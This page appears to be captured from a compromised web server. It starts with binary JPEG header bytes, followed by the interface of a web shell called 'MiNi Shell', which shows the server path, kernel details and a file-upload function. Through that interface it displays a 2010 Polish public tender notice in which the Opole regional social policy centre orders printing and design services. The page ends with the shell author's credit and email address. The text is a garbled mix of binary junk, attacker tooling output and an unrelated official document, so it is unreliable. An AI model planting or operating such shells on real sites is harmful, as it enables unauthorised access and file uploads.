JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100513/129592-N-2010.html

<p class="kh_header"><b>Opole: Przedmiotem zamówienia jest sukcesywna usługa druku  wraz usługami składu, łamania, korekty, projektów graficznych oraz  dostawą publikacji, plakatów i  ulotek na potrzeby Regionalnego Ośrodka Polityki Społecznej w Opolu.</b><br>
<b>Numer ogłoszenia: 129592 - 2010; data zamieszczenia: 13.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalny Ośrodek Polityki Społecznej w Opolu , ul. Głogowska 25C, 45-315 Opole, woj. opolskie, tel. 077 44 152 50, faks 077 44 152 59.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest sukcesywna usługa druku  wraz usługami składu, łamania, korekty, projektów graficznych oraz  dostawą publikacji, plakatów i  ulotek na potrzeby Regionalnego Ośrodka Polityki Społecznej w Opolu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna usługa druku  wraz usługami składu, łamania, korekty, projektów graficznych oraz  dostawą publikacji, plakatów i  ulotek na potrzeby Regionalnego Ośrodka Polityki Społecznej w Opolu, projektu systemowego Podnoszenie kwalifikacji kadry  pomocy i integracji społecznej w  województwie opolskim Poddziałanie 7.1.3, projektu  systemowego Wsparcie dla opolskiego modelu ekonomii społecznej Poddziałanie 7.2.2. realizowanych w ramach Programu Operacyjnego Kapitał Ludzki oraz na potrzeby projektu realizowanego w ramach Rządowego  Programu Ograniczania Przestępczości i Aspołecznych Zachowań Razem Bezpieczniej, a także projektu Kolorowa jesień życia realizowanego w ramach obchodów Europejskiego Roku Walki z Ubóstwem i Wykluczeniem Społecznym 2010.
Szczegóły dotyczące przedmiotu zamówienia określone są w SIWZ oraz we wzorach umowy stanowiących zał. do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2, 79.82.30.00-0, 79.82.11.00-6, 79.82.20.00-2, 79.82.25.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego opisu spełnienia warunku w tym zakresie oprócz oświadczenia o spełnieniu warunku, o którym mowa w art. 22 ustawy Prawo zamówień publicznych na podstawie, którego przeprowadzi ocenę spełnienia warunków.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie części I Zamawiający wymaga wykonania co najmniej jednej usługi podobnej do przedmiotu zamówienia w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie o wartości co najmniej 5 000,00 zł brutto  wraz z dokumentami np. referencje, protokoły odbioru, potwierdzającymi, że usługa ta została wykonana należycie. 
W zakresie części II Zamawiający wymaga wykonania co najmniej jednej usługi podobnej do przedmiotu zamówienia w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie o wartości co najmniej 10 000,00 zł brutto  wraz z dokumentami np. referencje, protokoły odbioru, potwierdzającymi, że usługa ta została wykonana należycie. 
W zakresie części III Zamawiający wymaga wykonania co najmniej jednej usługi podobnej do przedmiotu zamówienia w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie o wartości co najmniej 1 000,00 zł brutto wraz z dokumentami np. referencje, protokoły odbioru, potwierdzającymi, że usługa ta została wykonana należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego opisu spełnienia warunku w tym zakresie oprócz oświadczenia o spełnieniu warunku, o którym mowa w art. 22 ustawy Prawo zamówień publicznych na podstawie, którego przeprowadzi ocenę spełnienia warunków.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego opisu spełnienia warunku w tym zakresie oprócz oświadczenia o spełnieniu warunku, o którym mowa w art. 22 ustawy Prawo zamówień publicznych na podstawie, którego przeprowadzi ocenę spełnienia warunków.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego opisu spełnienia warunku w tym zakresie oprócz oświadczenia o spełnieniu warunku, o którym mowa w art. 22 ustawy Prawo zamówień publicznych na podstawie, którego przeprowadzi ocenę spełnienia warunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta Wykonawcy sporządzona wg wzoru Zamawiającego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewidywane zmiany do umowy cz. 1:
Zamawiający przewiduje następujące zmiany: 
- zmianę terminów wykonania poszczególnych edycji biuletynu, co może być spowodowane niezebraniem przez Zamawiającego odpowiedniej ilości materiałów dotyczących realizacji projektu, 
w takim przypadku Zamawiający niezwłocznie poinformuje o tym Wykonawcę,
- nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, 
- konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych 
w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym instytucjami nadzorującymi realizację projektu, w ramach którego realizowane jest zamówienie,
- konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej, 
- wynikną rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony,
- nastąpi ustawowa zmiany stawki podatku VAT, strony dostosują wskazaną w umowie stawkę do obowiązujących przepisów prawa,
- nastąpi zmiana przedmiotu umowy w szczególności dot. względów, technicznych, wtedy Zamawiający może wskazać inne sposoby realizacji przedmiotu umowy.
Zamawiający podczas realizacji umowy dopuszcza zmiany podmiotów trzecich na 
zasobach, których opierał się wykonawca wskazując spełnianie warunków udziału w postępowaniu pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż dotychczasowy podwykonawca wskazany w ofercie.

Przewidywane zmiany do umowy cz. 2:

Zamawiający przewiduje następujące zmiany: 
- zmianę terminu wykonania przedmiotu zamówienia, co może być spowodowane niezebraniem przez Zamawiającego w odpowiednim czasie materiałów merytorycznych dotyczących realizacji przedmiotu zamówienia, w takim przypadku Zamawiający niezwłocznie poinformuje o tym Wykonawcę,
- zmianę terminu realizacji jednorazowego zamówienia/zadania, co może być spowodowane nieprzewidzianą czasochłonnością lub/i stopniem skomplikowania zamówienia/zadania, w takim przypadku Zamawiający wyznaczy nowy termin,
- nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, 
- konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych 
w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym instytucjami nadzorującymi realizację projektu, w ramach którego realizowane jest zamówienie,
- konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących programów i projektów, o których mowa w § 1 ust. 1 lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej, 
- wynikną rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony,
- nastąpi ustawowa zmiany stawki podatku VAT, strony dostosują wskazaną w umowie stawkę do obowiązujących przepisów prawa,
- nastąpi zmiana przedmiotu umowy w szczególności dot. względów, technicznych, wtedy Zamawiający może wskazać inne sposoby realizacji przedmiotu umowy.
Zamawiający podczas realizacji umowy dopuszcza zmiany podmiotów trzecich na 
zasobach, których opierał się wykonawca wskazując spełnianie warunków udziału w postępowaniu pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż dotychczasowy podwykonawca wskazany w ofercie.
Przewidywane zmiany do umowy cz. 3:
Zamawiający przewiduje następujące zmiany: 
- nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, 
- konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych 
w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym instytucjami nadzorującymi realizację projektu, w ramach którego realizowane jest zamówienie,
- konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących programów 
i projektów, o których mowa w § 1 ust. 1 lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej, 
- wynikną rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób 
a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony,
- nastąpi ustawowa zmiany stawki podatku VAT, strony dostosują wskazaną w umowie stawkę do obowiązujących przepisów prawa,
- nastąpi zmiana przedmiotu umowy w szczególności dot. względów, technicznych, wtedy Zamawiający może wskazać inne sposoby realizacji przedmiotu umowy.
Zamawiający podczas realizacji umowy dopuszcza zmiany podmiotów trzecich na zasobach, których opierał się wykonawca wskazując spełnianie warunków udziału w postępowaniu pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż dotychczasowy podwykonawca wskazany w ofercie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rops-opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ROPS 
w Opolu ul. Głogowska 25 c, 45-315 Opole..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.05.2010 godzina 11:00, miejsce: ROPS w Opolu ul. Głogowska 25 c, 45-315 Opole pok. 15 - Sekretariat;..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Kapitał Ludzki 
Obchody Europejskiego Roku Walki z Ubóstwem i Wykluczeniem Społecznym 2010.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> BIULETYN INFORMACYJNY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie, tj.  opracowanie graficzne, łamanie, skład, korekta, druk oraz  dostawa biuletynu informacyjnego wydawanego w ramach projektu systemowego Podnoszenie kwalifikacji kadry  pomocy i integracji społecznej w  województwie opolskim  realizowanego  w ramach Programu Operacyjnego Kapitał Ludzki.
Szczegóły dotyczące realizacji przedmiotu zamówienia w zakresie części nr 1 określone są w SIWZ oraz we wzorze umowy stanowiącym zał. do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2, 78.92.30.00-9, 79.82.11.00-6, 79.82.20.00-2, 79.82.25.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PUBLIKACJE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywne wykonywanie, tj.  opracowanie graficzne, łamanie, skład, korekta, druk oraz  dostawa  publikacji na potrzeby Regionalnego Ośrodka Polityki Społecznej w Opolu, projektu systemowego Podnoszenie kwalifikacji kadry  pomocy i integracji społecznej 
w  województwie opolskim Poddziałanie 7.1.3, projektu  systemowego Wsparcie dla opolskiego modelu ekonomii społecznej Poddziałanie 7.2.2. realizowanych w ramach Programu Operacyjnego Kapitał Ludzki oraz na potrzeby projektu realizowanego w ramach Rządowego  Programu Ograniczania Przestępczości i Aspołecznych Zachowań Razem Bezpieczniej, a także projektu Kolorowa jesień życia realizowanego w ramach obchodów Europejskiego Roku Walki z Ubóstwem i Wykluczeniem Społecznym 2010. Niniejszy przedmiot zamówienia składa się z 9 zadań.
Szczegóły dotyczące realizacji przedmiotu zamówienia w zakresie części nr 2 określone są w SIWZ oraz we wzorze umowy stanowiącym zał. do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2, 79.82.30.00-9, 79.82.11.00-6, 79.82.20.00-2, 79.82.25.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PLAKATY, ULOTKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie, tj.  opracowanie graficzne, druk oraz  dostawa  plakatów oraz ulotek na potrzeby projektu systemowego Podnoszenie kwalifikacji kadry  pomocy i integracji społecznej w  województwie opolskim Poddziałanie 7.1.3 realizowanego w ramach Programu Operacyjnego Kapitał Ludzki oraz na potrzeby projektu realizowanego w ramach Rządowego  Programu Ograniczania Przestępczości i Aspołecznych Zachowań Razem Bezpieczniej, a także projektu Kolorowa jesień życia realizowanego w ramach obchodów Europejskiego Roku Walki z Ubóstwem i Wykluczeniem Społecznym 2010. Niniejszy przedmiot zamówienia składa się z 2 zadań.
Szczegóły dotyczące realizacji przedmiotu zamówienia w zakresie części nr 3 określone są w SIWZ oraz we wzorze umowy stanowiącym zał. do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2, 79.82.30.00-9, 79.82.25.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com